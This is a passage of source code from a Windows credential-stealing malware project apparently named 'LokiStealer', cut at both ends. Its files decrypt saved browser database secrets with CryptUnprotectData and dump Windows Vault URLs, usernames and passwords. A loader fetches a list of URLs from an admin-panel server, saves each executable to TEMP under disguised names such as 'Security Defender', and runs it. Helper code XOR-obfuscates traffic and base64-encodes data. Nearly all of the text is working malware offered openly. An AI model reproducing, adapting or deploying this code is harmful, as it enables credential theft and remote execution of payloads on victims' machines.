0x48B2364BU, 0xD80D2BDAU, 0xAF0A1B4CU, 47 | 0x36034AF6U, 0x41047A60U, 0xDF60EFC3U, 0xA867DF55U, 0x316E8EEFU, 48 | 0x4669BE79U, 0xCB61B38CU, 0xBC66831AU, 0x256FD2A0U, 0x5268E236U, 49 | 0xCC0C7795U, 0xBB0B4703U, 0x220216B9U, 0x5505262FU, 0xC5BA3BBEU, 50 | 0xB2BD0B28U, 0x2BB45A92U, 0x5CB36A04U, 0xC2D7FFA7U, 0xB5D0CF31U, 51 | 0x2CD99E8BU, 0x5BDEAE1DU, 0x9B64C2B0U, 0xEC63F226U, 0x756AA39CU, 52 | 0x026D930AU, 0x9C0906A9U, 0xEB0E363FU, 0x72076785U, 0x05005713U, 53 | 0x95BF4A82U, 0xE2B87A14U, 0x7BB12BAEU, 0x0CB61B38U, 0x92D28E9BU, 54 | 0xE5D5BE0DU, 0x7CDCEFB7U, 0x0BDBDF21U, 0x86D3D2D4U, 0xF1D4E242U, 55 | 0x68DDB3F8U, 0x1FDA836EU, 0x81BE16CDU, 0xF6B9265BU, 0x6FB077E1U, 56 | 0x18B74777U, 0x88085AE6U, 0xFF0F6A70U, 0x66063BCAU, 0x11010B5CU, 57 | 0x8F659EFFU, 0xF862AE69U, 0x616BFFD3U, 0x166CCF45U, 0xA00AE278U, 58 | 0xD70DD2EEU, 0x4E048354U, 0x3903B3C2U, 0xA7672661U, 0xD06016F7U, 59 | 0x4969474DU, 0x3E6E77DBU, 0xAED16A4AU, 0xD9D65ADCU, 0x40DF0B66U, 60 | 0x37D83BF0U, 0xA9BCAE53U, 0xDEBB9EC5U, 0x47B2CF7FU, 0x30B5FFE9U, 61 | 0xBDBDF21CU, 0xCABAC28AU, 0x53B39330U, 0x24B4A3A6U, 0xBAD03605U, 62 | 0xCDD70693U, 0x54DE5729U, 0x23D967BFU, 0xB3667A2EU, 0xC4614AB8U, 63 | 0x5D681B02U, 0x2A6F2B94U, 0xB40BBE37U, 0xC30C8EA1U, 0x5A05DF1BU, 64 | 0x2D02EF8DU 65 | }; 66 | 67 | constexpr uint32_t compute(const wchar_t* data, uint32_t len, uint32_t crc = 0) 68 | { 69 | crc = crc ^ 0xFFFFFFFFU; 70 | for (uint32_t i = 0; i < len; i++) 71 | { 72 | crc = table[*data ^ (crc & 0xFF)] ^ (crc >> 8); 73 | data++; 74 | } 75 | crc = crc ^ 0xFFFFFFFFU; 76 | return crc; 77 | } 78 | } 79 | 80 | uint32_t crc(const wchar_t* data, uint32_t len); 81 | #define CRC32_STR(A) \ 82 | std::integral_constant::value -------------------------------------------------------------------------------- /Source/LokiStealer/Export.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "sqlite3.h" 5 | #include "export.h" 6 | #include "vector.h" 7 | #include "fncs.h" 8 | #include "mem.h" 9 | 10 | #pragma comment(lib, "crypt32.lib") 11 | 12 | char *UnProtect(BYTE* pass, SIZE_T srclen, SIZE_T* out_len) { 13 | DATA_BLOB in; 14 | DATA_BLOB out; 15 | 16 | if (pass == NULL || srclen < 1) { 17 | CHAR* m = (CHAR*)_alloc(2); 18 | lstrcpyA(m, " "); 19 | return m; 20 | } 21 | 22 | in.pbData = (BYTE*)_alloc(srclen); 23 | in.cbData = srclen; 24 | _copy(in.pbData, pass, srclen); 25 | 26 | if (CryptUnprotectData(&in, 0, 0, 0, 0, 0, &out)) { 27 | char *decrypted_mem = (char *)_alloc(out.cbData + 1); 28 | char *decrypted = (char *)out.pbData; 29 | 30 | _copy(decrypted_mem, decrypted, out.cbData); 31 | 32 | _free(in.pbData); 33 | LocalFree(out.pbData); 34 | 35 | out_len[0] = out.cbData; 36 | return decrypted_mem; 37 | } 38 | else { 39 | _free(in.pbData); 40 | return NULL; 41 | } 42 | } 43 | 44 | BOOL checkEncrypted(int e[], int s, int in) { 45 | for (int i = 0; i < s; i++) { 46 | if ((e[i] - 1) == in) return 1; 47 | } 48 | return 0; 49 | } 50 | 51 | LPCWSTR moveRandom(LPCWSTR path) { 52 | DWORD dwAttrib = GetFileAttributesW(path); 53 | 54 | BOOL exists = (dwAttrib != INVALID_FILE_ATTRIBUTES && 55 | !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); 56 | 57 | if (exists) { 58 | WCHAR* newPath = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 59 | SIZE_T ticks = GetTickCount(); 60 | wnsprintfW(newPath, 260, L"%s%u", path, ticks); 61 | if (!CopyFileW(path, newPath, FALSE)) return 0; 62 | 63 | return newPath; 64 | } 65 | else return 0; 66 | } 67 | 68 | char* makeString(BYTE* data, CHAR* append, SIZE_T append_len, SIZE_T len) { 69 | BYTE* mem = (BYTE*)_alloc(append_len + len + 4); 70 | if (append) lstrcpyA((char*)mem, append); 71 | if (data) data != 0 ? lstrcatA((char*)mem, (char*)data) : lstrcpyA((char*)mem, (char*)data); 72 | 73 | return (char*)mem; 74 | } 75 | 76 | void _sqliteProcessFunc(vector* v, SIZE_T* count_value, LPCWSTR dbPath, LPCSTR query, LPCSTR endstr, int addrn, int count, int encrypted_columns[], char* columns_prefix[], int encrypted_columns_count) { 77 | LPCWSTR db_path = moveRandom(dbPath); 78 | 79 | if (db_path != 0 && dbPath != 0) { 80 | sqlite3_stmt *stmt; 81 | sqlite3 *db; 82 | 83 | if (sqlite3_open16(db_path, &db) == SQLITE_OK) { 84 | if (sqlite3_prepare_v2(db, query, -1, &stmt, 0) == SQLITE_OK) { 85 | while (sqlite3_step(stmt) == SQLITE_ROW) { 86 | SIZE_T size = 0; 87 | for (int i = 0; i < count; i++) { 88 | if (checkEncrypted(encrypted_columns, encrypted_columns_count, i)) { 89 | BYTE *bytes = (BYTE *)sqlite3_column_blob(stmt, i); 90 | SIZE_T bytes_len = sqlite3_column_bytes(stmt, i); 91 | CHAR* decrypted = UnProtect(bytes, bytes_len, &size); 92 | 93 | CHAR* out_str = makeString((BYTE*)decrypted, columns_prefix[i], size, lstrlenA(columns_prefix[i])); 94 | _free(decrypted); 95 | vector_add(v, out_str); 96 | 97 | if(addrn) vector_add(v, makeString((BYTE*)"\r\n", (char*)"", 0, 2)); 98 | *count_value += 1; 99 | } 100 | else { 101 | BYTE *bytes = (BYTE *)sqlite3_column_blob(stmt, i); 102 | SIZE_T bytes_len = sqlite3_column_bytes(stmt, i); 103 | CHAR* v_val = makeString(bytes, columns_prefix[i], lstrlenA(columns_prefix[i]), bytes_len); 104 | 105 | vector_add(v, v_val); 106 | if (addrn) vector_add(v, makeString((BYTE*)"\r\n", (char*)"", 0, 2)); 107 | *count_value += 1; 108 | } 109 | } 110 | vector_add(v, makeString((BYTE*)endstr, (char*)"", 0, lstrlenA(endstr))); 111 | } 112 | } 113 | sqlite3_finalize(stmt); 114 | sqlite3_close(db); 115 | } 116 | } 117 | if (db_path) DeleteFileW(db_path); 118 | if (db_path) _free((void*)db_path); 119 | } 120 | 121 | vector sqliteProcessFunction(LPCWSTR dbPath, SIZE_T* count_value, LPCSTR query, LPCSTR endstr, int addrn, int count, int encrypted_columns[], char* columns_prefix[], int encrypted_columns_count) { 122 | vector v; 123 | vector_init(&v); 124 | _sqliteProcessFunc(&v, count_value, dbPath, query, endstr, addrn, count, encrypted_columns, columns_prefix, encrypted_columns_count); 125 | return v; 126 | } 127 | 128 | void vec_get_str(vector v, CHAR** c, SIZE_T* s, SIZE_T prefix_len) { 129 | SIZE_T d_size = 0; 130 | SIZE_T now_copy = 0; 131 | 132 | SIZE_T v_size = vector_count(&v); 133 | 134 | for (SIZE_T i = 0; i < v_size; i++) { 135 | d_size += lstrlenA((CHAR*)vector_get(&v, i)); 136 | } 137 | 138 | SIZE_T out_size = ((v_size * (prefix_len + 3)) + d_size) + 1; 139 | CHAR * out_mem = (CHAR*)_alloc(out_size); 140 | 141 | for (SIZE_T i = 0; i < v_size; i++) { 142 | CHAR* c = (CHAR*)vector_get(&v, i); 143 | wnsprintfA(out_mem + now_copy, out_size - now_copy, "%s", c); 144 | //_copy((out_mem + now_copy), c, lstrlenA(c)); 145 | now_copy += lstrlenA(c); 146 | _free(c); 147 | } 148 | 149 | c[0] = out_mem; 150 | s[0] = lstrlenA(out_mem); 151 | } -------------------------------------------------------------------------------- /Source/LokiStealer/Ldr.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "parson.h" 8 | #include "fncs.h" 9 | #include "mem.h" 10 | #include "ldr.h" 11 | 12 | char* _itoa(int i, char b[]) { 13 | char const digit[] = "0123456789"; 14 | char* p = b; 15 | if (i < 0) { 16 | *p++ = '-'; 17 | i *= -1; 18 | } 19 | int shifter = i; 20 | do { 21 | ++p; 22 | shifter = shifter / 10; 23 | } while (shifter); 24 | *p = '\0'; 25 | do { 26 | *--p = digit[i % 10]; 27 | i = i / 10; 28 | } while (i); 29 | return b; 30 | } 31 | 32 | void downloadFile(LPCWSTR path, LPCSTR link) { 33 | DWORD dwBytesRead = 1; 34 | 35 | if (HINTERNET hInternetSession = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0)) { 36 | if (HINTERNET hURL = InternetOpenUrlA(hInternetSession, link, 0, 0, 0, 0)) { 37 | if (char* buf = (char*)_alloc(1024)) { 38 | DWORD dwTemp; 39 | HANDLE hFile = CreateFileW(path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 40 | 41 | if (INVALID_HANDLE_VALUE == hFile) { 42 | return; 43 | } 44 | 45 | while (dwBytesRead > 0) 46 | { 47 | InternetReadFile(hURL, buf, (DWORD)1024, &dwBytesRead); 48 | WriteFile(hFile, buf, dwBytesRead, &dwTemp, NULL); 49 | } 50 | 51 | _free(buf); 52 | 53 | InternetCloseHandle(hURL); 54 | InternetCloseHandle(hInternetSession); 55 | 56 | CloseHandle(hFile); 57 | } 58 | } 59 | } 60 | } 61 | 62 | int crand() { 63 | BYTE pbData[1]; 64 | HCRYPTPROV hCryptProv; 65 | if (CryptAcquireContextW(&hCryptProv, NULL, L"Microsoft Base Cryptographic Provider v1.0", PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) { 66 | if (CryptAcquireContextW(&hCryptProv, NULL, L"Microsoft Base Cryptographic Provider v1.0", PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) 67 | { 68 | if (CryptGenRandom(hCryptProv, 1, pbData)) 69 | { 70 | CryptReleaseContext(hCryptProv, 0); 71 | return pbData[0]; 72 | } 73 | } 74 | } 75 | 76 | return 0; 77 | } 78 | 79 | LPCWSTR getName() { 80 | WCHAR charlist[] = { 81 | L'A', L'B', L'C', L'D', L'E', L'F', 82 | L'G', L'H', L'I', L'J', L'K', L'L', 83 | L'M', L'N', L'O', L'P', L'Q', L'R', 84 | L'S', L'T', L'U', L'V', L'W', L'X', 85 | L'Y', L'Z', L'0', L'1', L'2', L'3', 86 | L'4', L'5', L'6', L'7', L'8', L'9' 87 | }; 88 | 89 | LPCWSTR list[] = { 90 | L"System", L"Process", L"Update", L"Memory", L"Browser", 91 | L"Security", L"Defender", L"Monitor", L"Protector", L"Optimization", 92 | L"Finder", L"Zip" 93 | }; 94 | 95 | int a = crand() % (_countof(list) - 1); 96 | int b = crand() % (_countof(list) - 1); 97 | while (a == b) b = crand() % (_countof(list) - 1); 98 | 99 | int alcsize = (lstrlenW(list[a]) + lstrlenW(list[b]) + 14) * sizeof(WCHAR); 100 | 101 | LPCWSTR buf = (WCHAR*)_alloc(alcsize); 102 | WCHAR c1 = charlist[crand() % 35]; 103 | WCHAR c2 = charlist[crand() % 35]; 104 | WCHAR c3 = charlist[crand() % 35]; 105 | WCHAR c4 = charlist[crand() % 35]; 106 | WCHAR c5 = charlist[crand() % 35]; 107 | WCHAR c6 = charlist[crand() % 35]; 108 | WCHAR c7 = charlist[crand() % 35]; 109 | WCHAR c8 = charlist[crand() % 35]; 110 | WCHAR c9 = charlist[crand() % 35]; 111 | 112 | wnsprintfW((WCHAR*)buf, alcsize, L"%s %s {%c%c%c%c%c%c%c%c%c}", list[a], list[b], c1, c2, c3, c4, c5, c6, c7, c8, c9); 113 | return buf; 114 | } 115 | 116 | LPCWSTR generateFilePath() { 117 | LPWSTR Temp = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 118 | LPWSTR ExecuteFilePath = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 119 | LPCWSTR fileName = getName(); 120 | 121 | GetEnvironmentVariableW(L"TEMP", Temp, MAX_PATH * sizeof(WCHAR)); 122 | wnsprintfW(ExecuteFilePath, MAX_PATH, L"%s\\%s.exe", Temp, fileName); 123 | 124 | _free(Temp); 125 | _free((WCHAR*)fileName); 126 | return ExecuteFilePath; 127 | } 128 | 129 | void runLdr() { 130 | CHAR* szBuffer = (CHAR*)_alloc(2048); 131 | 132 | if (HINTERNET hIntSession = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0)) { 133 | if (HINTERNET hHttpSession = InternetConnectW(hIntSession, ADMIN_PANEL, 80, 0, 0, INTERNET_SERVICE_HTTP, 0, NULL)) { 134 | if (HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", LDR_URL, 0, 0, 0, INTERNET_FLAG_RELOAD, 0)) { 135 | if (HttpSendRequestA(hHttpRequest, "Content-Type: application/x-www-form-urlencoded", 24, NULL, NULL)) { 136 | 137 | DWORD dwRead = 0; 138 | while (InternetReadFile(hHttpRequest, szBuffer, 2048, &dwRead) && dwRead) { 139 | szBuffer[dwRead] = 0; 140 | dwRead = 0; 141 | } 142 | 143 | InternetCloseHandle(hHttpRequest); 144 | InternetCloseHandle(hHttpSession); 145 | InternetCloseHandle(hIntSession); 146 | } 147 | } 148 | } 149 | } 150 | 151 | JSON_Value *root_value = json_parse_string(szBuffer); 152 | 153 | char* integer = (char*)_alloc(MAX_PATH); 154 | JSON_Object *root_object = json_value_get_object(root_value); 155 | for (size_t i = 0; i < json_object_get_count(root_object); i++) { 156 | wnsprintfA(integer, MAX_PATH, "%u", i); 157 | const char* str = json_object_get_string(root_object, integer); 158 | 159 | LPCWSTR fp = generateFilePath(); 160 | if (fp) { 161 | wprintf(fp); 162 | downloadFile(fp, str); 163 | ShellExecuteW(0, L"open", fp, 0, 0, SW_SHOW); 164 | } 165 | _free((void*)fp); 166 | } 167 | _free(integer); 168 | _free(szBuffer); 169 | json_value_free(root_value); 170 | } -------------------------------------------------------------------------------- /Source/LokiStealer/Cred.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "vector.h" 5 | #include "mem.h" 6 | #include "Cred.h" 7 | 8 | namespace cred { 9 | extern bool initialized; 10 | extern HMODULE hvaultLib; 11 | BOOL init(void); 12 | void finalize(void); 13 | void savepass(vector* v, SIZE_T* count); 14 | } 15 | 16 | bool cred::initialized = false; 17 | HMODULE cred::hvaultLib = NULL; 18 | 19 | typedef HANDLE HVAULT; 20 | #define VAULT_ENUMERATE_ALL_ITEMS 512 21 | 22 | enum VAULT_SCHEMA_ELEMENT_ID { 23 | ElementId_Illegal = 0, 24 | ElementId_Resource = 1, 25 | ElementId_Identity = 2, 26 | ElementId_Authenticator = 3, 27 | ElementId_Tag = 4, 28 | ElementId_PackageSid = 5, 29 | ElementId_AppStart = 0x64, 30 | ElementId_AppEnd = 0x2710 31 | }; 32 | 33 | enum VAULT_ELEMENT_TYPE { 34 | ElementType_Boolean = 0, 35 | ElementType_Short = 1, 36 | ElementType_UnsignedShort = 2, 37 | ElementType_Integer = 3, 38 | ElementType_UnsignedInteger = 4, 39 | ElementType_Double = 5, 40 | ElementType_Guid = 6, 41 | ElementType_String = 7, 42 | ElementType_ByteArray = 8, 43 | ElementType_TimeStamp = 9, 44 | ElementType_ProtectedArray = 0xA, 45 | ElementType_Attribute = 0xB, 46 | ElementType_Sid = 0xC, 47 | ElementType_Last = 0xD, 48 | ElementType_Undefined = 0xFFFFFFFF 49 | }; 50 | 51 | typedef struct _VAULT_BYTE_BUFFER { 52 | DWORD Length; 53 | PBYTE Value; 54 | } VAULT_BYTE_BUFFER, *PVAULT_BYTE_BUFFER; 55 | 56 | typedef struct _VAULT_ITEM_DATA { 57 | DWORD SchemaElementId; 58 | DWORD unk0; 59 | VAULT_ELEMENT_TYPE Type; 60 | DWORD unk1; 61 | union { 62 | BOOL Boolean; 63 | SHORT Short; 64 | WORD UnsignedShort; 65 | LONG Int; 66 | ULONG UnsignedInt; 67 | DOUBLE Double; 68 | GUID Guid; 69 | LPWSTR String; 70 | VAULT_BYTE_BUFFER ByteArray; 71 | VAULT_BYTE_BUFFER ProtectedArray; 72 | DWORD Attribute; 73 | DWORD Sid; 74 | } data; 75 | } VAULT_ITEM_DATA, *PVAULT_ITEM_DATA; 76 | 77 | typedef struct _VAULT_ITEM_8 { 78 | GUID SchemaId; 79 | PWSTR FriendlyName; 80 | PVAULT_ITEM_DATA Resource; 81 | PVAULT_ITEM_DATA Identity; 82 | PVAULT_ITEM_DATA Authenticator; 83 | PVAULT_ITEM_DATA PackageSid; 84 | FILETIME LastWritten; 85 | DWORD Flags; 86 | DWORD cbProperties; 87 | PVAULT_ITEM_DATA Properties; 88 | } VAULT_ITEM, *PVAULT_ITEM; 89 | 90 | typedef DWORD(WINAPI *VaultEnumerateVaults)(DWORD flags, PDWORD count, GUID **guids); 91 | typedef DWORD(WINAPI *VaultEnumerateItems)(HVAULT handle, DWORD flags, PDWORD count, PVOID *items); 92 | typedef DWORD(WINAPI *VaultOpenVault)(GUID *id, DWORD flags, HVAULT *handle); 93 | typedef DWORD(WINAPI *VaultCloseVault)(HVAULT handle); 94 | typedef DWORD(WINAPI *VaultFree)(PVOID mem); 95 | typedef DWORD(WINAPI * PVAULTGETITEM) (HANDLE vault, LPGUID SchemaId, PVAULT_ITEM_DATA Resource, PVAULT_ITEM_DATA Identity, PVAULT_ITEM_DATA PackageSid, HWND hWnd, DWORD Flags, PVAULT_ITEM * pItem); 96 | 97 | VaultEnumerateItems pVaultEnumerateItems; 98 | VaultFree pVaultFree; 99 | VaultOpenVault pVaultOpenVault; 100 | VaultCloseVault pVaultCloseVault; 101 | VaultEnumerateVaults pVaultEnumerateVaults; 102 | PVAULTGETITEM pVaultGetItem; 103 | 104 | BOOL cred::init(void) { 105 | if (initialized) return TRUE; 106 | 107 | if (!(hvaultLib = LoadLibraryW(L"vaultcli.dll"))) { 108 | return FALSE; 109 | } 110 | 111 | pVaultEnumerateItems = (VaultEnumerateItems)GetProcAddress(hvaultLib, "VaultEnumerateItems"); 112 | pVaultEnumerateVaults = (VaultEnumerateVaults)GetProcAddress(hvaultLib, "VaultEnumerateVaults"); 113 | pVaultFree = (VaultFree)GetProcAddress(hvaultLib, "VaultFree"); 114 | pVaultOpenVault = (VaultOpenVault)GetProcAddress(hvaultLib, "VaultOpenVault"); 115 | pVaultCloseVault = (VaultCloseVault)GetProcAddress(hvaultLib, "VaultCloseVault"); 116 | pVaultGetItem = (PVAULTGETITEM)GetProcAddress(hvaultLib, "VaultGetItem"); 117 | 118 | if (!pVaultEnumerateItems || !pVaultEnumerateVaults || !pVaultFree || !pVaultOpenVault || !pVaultCloseVault || !pVaultGetItem) { 119 | FreeLibrary(hvaultLib); 120 | return FALSE; 121 | } 122 | 123 | initialized = true; 124 | return TRUE; 125 | } 126 | 127 | void cred::finalize(void) { 128 | if (!initialized) return; 129 | 130 | if (hvaultLib) { 131 | FreeLibrary(hvaultLib); 132 | } 133 | 134 | initialized = false; 135 | } 136 | 137 | void cred::savepass(vector* v, SIZE_T* count) { 138 | if (!initialized) return; 139 | 140 | DWORD vaultsCounter, itemsCounter; 141 | LPGUID vaults; 142 | HVAULT hVault; 143 | PVOID items; 144 | PVAULT_ITEM vaultItems, pVaultItems; 145 | 146 | if (pVaultEnumerateVaults(NULL, &vaultsCounter, &vaults) != ERROR_SUCCESS) { 147 | return; 148 | } 149 | 150 | for (DWORD i = 0; i < vaultsCounter; i++) { 151 | 152 | if (pVaultOpenVault(&vaults[i], 0, &hVault) == ERROR_SUCCESS) { 153 | 154 | if (pVaultEnumerateItems(hVault, VAULT_ENUMERATE_ALL_ITEMS, &itemsCounter, &items) == ERROR_SUCCESS) { 155 | 156 | vaultItems = (PVAULT_ITEM)items; 157 | 158 | for (DWORD j = 0; j < itemsCounter; j++) { 159 | CHAR* url = (CHAR*)_alloc(MAX_PATH); 160 | wnsprintfA(url, MAX_PATH, "Url: %ws\r\n", vaultItems[j].Resource->data.String); 161 | vector_add(v, url); 162 | 163 | CHAR* user = (CHAR*)_alloc(MAX_PATH); 164 | wnsprintfA(user, MAX_PATH, "Username: %ws\r\n", vaultItems[j].Identity->data.String); 165 | vector_add(v, user); 166 | 167 | pVaultItems = NULL; 168 | 169 | if (pVaultGetItem(hVault, &vaultItems[j].SchemaId, vaultItems[j].Resource, vaultItems[j].Identity, vaultItems[j].PackageSid, NULL, 0, &pVaultItems) == 0) { 170 | if (pVaultItems->Authenticator != NULL && pVaultItems->Authenticator->data.String != NULL) { 171 | CHAR* pass = (CHAR*)_alloc(MAX_PATH); 172 | wnsprintfA(pass, MAX_PATH, "Username: %ws\r\n", pVaultItems->Authenticator->data.String); 173 | vector_add(v, pass); 174 | } 175 | 176 | pVaultFree(pVaultItems); 177 | } 178 | CHAR* lastsm = (CHAR*)_alloc(MAX_PATH); 179 | wnsprintfA(lastsm, MAX_PATH, "\r\n"); 180 | vector_add(v, lastsm); 181 | *count += 1; 182 | } 183 | 184 | pVaultFree(items); 185 | } 186 | pVaultCloseVault(&hVault); 187 | } 188 | } 189 | 190 | if (vaults) 191 | { 192 | pVaultFree(vaults); 193 | vaults = NULL; 194 | } 195 | } 196 | 197 | void enumCredentials(vector* v, SIZE_T* count) { 198 | if(cred::init() == TRUE) cred::savepass(v, count); 199 | } -------------------------------------------------------------------------------- /Source/LokiStealer/crypt.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "crypt.h" 5 | #include "mem.h" 6 | #include 7 | #include 8 | #include 9 | 10 | #pragma comment(lib, "Iphlpapi.lib") 11 | 12 | static const uint32_t table[256] = 13 | { 14 | 0x00000000U, 0x77073096U, 0xEE0E612CU, 0x990951BAU, 0x076DC419U, 15 | 0x706AF48FU, 0xE963A535U, 0x9E6495A3U, 0x0EDB8832U, 0x79DCB8A4U, 16 | 0xE0D5E91EU, 0x97D2D988U, 0x09B64C2BU, 0x7EB17CBDU, 0xE7B82D07U, 17 | 0x90BF1D91U, 0x1DB71064U, 0x6AB020F2U, 0xF3B97148U, 0x84BE41DEU, 18 | 0x1ADAD47DU, 0x6DDDE4EBU, 0xF4D4B551U, 0x83D385C7U, 0x136C9856U, 19 | 0x646BA8C0U, 0xFD62F97AU, 0x8A65C9ECU, 0x14015C4FU, 0x63066CD9U, 20 | 0xFA0F3D63U, 0x8D080DF5U, 0x3B6E20C8U, 0x4C69105EU, 0xD56041E4U, 21 | 0xA2677172U, 0x3C03E4D1U, 0x4B04D447U, 0xD20D85FDU, 0xA50AB56BU, 22 | 0x35B5A8FAU, 0x42B2986CU, 0xDBBBC9D6U, 0xACBCF940U, 0x32D86CE3U, 23 | 0x45DF5C75U, 0xDCD60DCFU, 0xABD13D59U, 0x26D930ACU, 0x51DE003AU, 24 | 0xC8D75180U, 0xBFD06116U, 0x21B4F4B5U, 0x56B3C423U, 0xCFBA9599U, 25 | 0xB8BDA50FU, 0x2802B89EU, 0x5F058808U, 0xC60CD9B2U, 0xB10BE924U, 26 | 0x2F6F7C87U, 0x58684C11U, 0xC1611DABU, 0xB6662D3DU, 0x76DC4190U, 27 | 0x01DB7106U, 0x98D220BCU, 0xEFD5102AU, 0x71B18589U, 0x06B6B51FU, 28 | 0x9FBFE4A5U, 0xE8B8D433U, 0x7807C9A2U, 0x0F00F934U, 0x9609A88EU, 29 | 0xE10E9818U, 0x7F6A0DBBU, 0x086D3D2DU, 0x91646C97U, 0xE6635C01U, 30 | 0x6B6B51F4U, 0x1C6C6162U, 0x856530D8U, 0xF262004EU, 0x6C0695EDU, 31 | 0x1B01A57BU, 0x8208F4C1U, 0xF50FC457U, 0x65B0D9C6U, 0x12B7E950U, 32 | 0x8BBEB8EAU, 0xFCB9887CU, 0x62DD1DDFU, 0x15DA2D49U, 0x8CD37CF3U, 33 | 0xFBD44C65U, 0x4DB26158U, 0x3AB551CEU, 0xA3BC0074U, 0xD4BB30E2U, 34 | 0x4ADFA541U, 0x3DD895D7U, 0xA4D1C46DU, 0xD3D6F4FBU, 0x4369E96AU, 35 | 0x346ED9FCU, 0xAD678846U, 0xDA60B8D0U, 0x44042D73U, 0x33031DE5U, 36 | 0xAA0A4C5FU, 0xDD0D7CC9U, 0x5005713CU, 0x270241AAU, 0xBE0B1010U, 37 | 0xC90C2086U, 0x5768B525U, 0x206F85B3U, 0xB966D409U, 0xCE61E49FU, 38 | 0x5EDEF90EU, 0x29D9C998U, 0xB0D09822U, 0xC7D7A8B4U, 0x59B33D17U, 39 | 0x2EB40D81U, 0xB7BD5C3BU, 0xC0BA6CADU, 0xEDB88320U, 0x9ABFB3B6U, 40 | 0x03B6E20CU, 0x74B1D29AU, 0xEAD54739U, 0x9DD277AFU, 0x04DB2615U, 41 | 0x73DC1683U, 0xE3630B12U, 0x94643B84U, 0x0D6D6A3EU, 0x7A6A5AA8U, 42 | 0xE40ECF0BU, 0x9309FF9DU, 0x0A00AE27U, 0x7D079EB1U, 0xF00F9344U, 43 | 0x8708A3D2U, 0x1E01F268U, 0x6906C2FEU, 0xF762575DU, 0x806567CBU, 44 | 0x196C3671U, 0x6E6B06E7U, 0xFED41B76U, 0x89D32BE0U, 0x10DA7A5AU, 45 | 0x67DD4ACCU, 0xF9B9DF6FU, 0x8EBEEFF9U, 0x17B7BE43U, 0x60B08ED5U, 46 | 0xD6D6A3E8U, 0xA1D1937EU, 0x38D8C2C4U, 0x4FDFF252U, 0xD1BB67F1U, 47 | 0xA6BC5767U, 0x3FB506DDU, 0x48B2364BU, 0xD80D2BDAU, 0xAF0A1B4CU, 48 | 0x36034AF6U, 0x41047A60U, 0xDF60EFC3U, 0xA867DF55U, 0x316E8EEFU, 49 | 0x4669BE79U, 0xCB61B38CU, 0xBC66831AU, 0x256FD2A0U, 0x5268E236U, 50 | 0xCC0C7795U, 0xBB0B4703U, 0x220216B9U, 0x5505262FU, 0xC5BA3BBEU, 51 | 0xB2BD0B28U, 0x2BB45A92U, 0x5CB36A04U, 0xC2D7FFA7U, 0xB5D0CF31U, 52 | 0x2CD99E8BU, 0x5BDEAE1DU, 0x9B64C2B0U, 0xEC63F226U, 0x756AA39CU, 53 | 0x026D930AU, 0x9C0906A9U, 0xEB0E363FU, 0x72076785U, 0x05005713U, 54 | 0x95BF4A82U, 0xE2B87A14U, 0x7BB12BAEU, 0x0CB61B38U, 0x92D28E9BU, 55 | 0xE5D5BE0DU, 0x7CDCEFB7U, 0x0BDBDF21U, 0x86D3D2D4U, 0xF1D4E242U, 56 | 0x68DDB3F8U, 0x1FDA836EU, 0x81BE16CDU, 0xF6B9265BU, 0x6FB077E1U, 57 | 0x18B74777U, 0x88085AE6U, 0xFF0F6A70U, 0x66063BCAU, 0x11010B5CU, 58 | 0x8F659EFFU, 0xF862AE69U, 0x616BFFD3U, 0x166CCF45U, 0xA00AE278U, 59 | 0xD70DD2EEU, 0x4E048354U, 0x3903B3C2U, 0xA7672661U, 0xD06016F7U, 60 | 0x4969474DU, 0x3E6E77DBU, 0xAED16A4AU, 0xD9D65ADCU, 0x40DF0B66U, 61 | 0x37D83BF0U, 0xA9BCAE53U, 0xDEBB9EC5U, 0x47B2CF7FU, 0x30B5FFE9U, 62 | 0xBDBDF21CU, 0xCABAC28AU, 0x53B39330U, 0x24B4A3A6U, 0xBAD03605U, 63 | 0xCDD70693U, 0x54DE5729U, 0x23D967BFU, 0xB3667A2EU, 0xC4614AB8U, 64 | 0x5D681B02U, 0x2A6F2B94U, 0xB40BBE37U, 0xC30C8EA1U, 0x5A05DF1BU, 65 | 0x2D02EF8DU 66 | }; 67 | 68 | uint32_t crc(const wchar_t* data, uint32_t len) 69 | { 70 | uint32_t crc = 0; 71 | crc = crc ^ 0xFFFFFFFFU; 72 | for (uint32_t i = 0; i < len; i++) 73 | { 74 | crc = table[*data ^ (crc & 0xFF)] ^ (crc >> 8); 75 | data++; 76 | } 77 | crc = crc ^ 0xFFFFFFFFU; 78 | return crc; 79 | } 80 | 81 | void TRAFFIC_ENCRYPT(unsigned char S[256], unsigned char* data, int data_len) { 82 | for (int i = 0; i < data_len; i++) { 83 | data[i] = data[i] ^ S[i % 256]; 84 | } 85 | } 86 | 87 | LPSTR base64Encode(LPBYTE source, SIZE_T sourceSize, SIZE_T *destSize) 88 | { 89 | static const char cb64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_";//-_ = +/ 90 | LPBYTE dest = (LPBYTE)_alloc((sourceSize + 2) / 3 * 4 + 1); 91 | if (dest) 92 | { 93 | LPBYTE p = dest; 94 | BYTE cur[3]; 95 | 96 | while (sourceSize > 0) 97 | { 98 | DWORD len = 0; 99 | for (DWORD i = 0; i < 3; i++) 100 | { 101 | if (sourceSize > 0) 102 | { 103 | sourceSize--; 104 | len++; 105 | cur[i] = source[i]; 106 | } 107 | else cur[i] = 